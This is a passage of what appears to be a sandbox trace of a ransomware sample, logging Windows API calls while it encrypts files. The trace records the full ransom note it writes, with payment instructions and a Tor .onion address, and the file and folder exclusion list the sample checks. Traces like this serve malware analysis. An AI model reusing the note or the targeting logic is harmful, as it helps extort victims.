shared\\ink\\ko-KR\\.xXE153.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\.xxe153.tmp")) returned 1 [0159.242] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0159.242] wcslen (_String="OK") returned 0x2 [0159.242] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.242] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.242] CryptDestroyKey (hKey=0x9ad578) returned 1 [0159.242] CryptDestroyHash (hHash=0x9ad678) returned 1 [0159.242] CryptReleaseContext (hProv=0x8e3550, dwFlags=0x0) returned 1 [0159.242] FindNextFileW (in: hFindFile=0x9ad338, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0159.242] GetLastError () returned 0x12 [0159.242] FindClose (in: hFindFile=0x9ad338 | out: hFindFile=0x9ad338) returned 1 [0159.242] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0159.242] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0159.243] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0159.243] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0159.243] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.243] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.243] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0159.243] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.243] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.243] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*.exe") returned 0 [0159.243] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*.dll") returned 0 [0159.243] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*.lnk") returned 0 [0159.243] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*.bat") returned 0 [0159.243] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*.ini") returned 0 [0159.243] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*.msi") returned 0 [0159.243] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*.scf") returned 0 [0159.243] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*pagefile.sys*") returned 0 [0159.243] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*NTUSER.DAT*") returned 0 [0159.244] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*AppData*") returned 0 [0159.244] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*\\winrar\\*") returned 0 [0159.244] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0159.244] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*\\java\\*") returned 0 [0159.244] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0159.244] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*\\windows\\*") returned 0 [0159.244] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*\\ESET\\*") returned 0 [0159.244] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*\\AVG\\*") returned 0 [0159.244] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*\\AVIRA\\*") returned 0 [0159.244] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0159.244] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*Atheros*") returned 0 [0159.244] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*Realtek*") returned 0 [0159.244] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*bootmgr*") returned 0 [0159.244] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*boot*") returned 0 [0159.244] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*boot*") returned 0 [0159.244] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*CONFIG.SYS*") returned 0 [0159.244] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*IO.SYS*") returned 0 [0159.244] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*MSDOS.SYS*") returned 0 [0159.244] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*NTDETECT.COM*") returned 0 [0159.244] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*ntldr*") returned 0 [0159.244] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*chrome*") returned 0 [0159.244] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*opera*") returned 0 [0159.244] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", pszSpec="*firefox*") returned 0 [0159.244] wcslen (_String="\\\\?\\") returned 0x4 [0159.244] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad178 [0159.244] wcscmp (_String1=".", _String2=".") returned 0 [0159.244] FindNextFileW (in: hFindFile=0x9ad178, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0159.244] wcscmp (_String1="..", _String2=".") returned 1 [0159.244] wcscmp (_String1="..", _String2="..") returned 0 [0159.244] FindNextFileW (in: hFindFile=0x9ad178, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0159.244] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*NMCRYPT") returned 0 [0159.244] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*Recovers your files.html") returned 0 [0159.244] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*.exe") returned 0 [0159.244] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*.dll") returned 0 [0159.244] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*.lnk") returned 0 [0159.244] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*.bat") returned 0 [0159.244] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*.ini") returned 0 [0159.244] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*.msi") returned 0 [0159.245] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*.scf") returned 0 [0159.245] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*pagefile.sys*") returned 0 [0159.245] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*NTUSER.DAT*") returned 0 [0159.245] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*AppData*") returned 0 [0159.245] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*\\winrar\\*") returned 0 [0159.245] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*\\Internet Explorer\\*") returned 0 [0159.245] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*\\java\\*") returned 0 [0159.245] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*\\TeamViewer\\*") returned 0 [0159.245] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*\\windows\\*") returned 0 [0159.245] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*\\ESET\\*") returned 0 [0159.245] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*\\AVG\\*") returned 0 [0159.245] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*\\AVIRA\\*") returned 0 [0159.245] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*\\AVAST Software\\*") returned 0 [0159.245] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*Atheros*") returned 0 [0159.245] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*Realtek*") returned 0 [0159.245] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*bootmgr*") returned 0 [0159.245] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*boot*") returned 0 [0159.245] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*boot*") returned 0 [0159.245] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*CONFIG.SYS*") returned 0 [0159.245] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*IO.SYS*") returned 0 [0159.245] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*MSDOS.SYS*") returned 0 [0159.245] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*NTDETECT.COM*") returned 0 [0159.245] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*ntldr*") returned 0 [0159.245] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*chrome*") returned 0 [0159.245] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*opera*") returned 0 [0159.245] PathMatchSpecW (pszFile="chstic.dgml", pszSpec="*firefox*") returned 0 [0159.245] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml", pszSpec="*") returned 1 [0159.245] strlen (_Str="NMoreira") returned 0x8 [0159.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.245] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.246] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.247] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 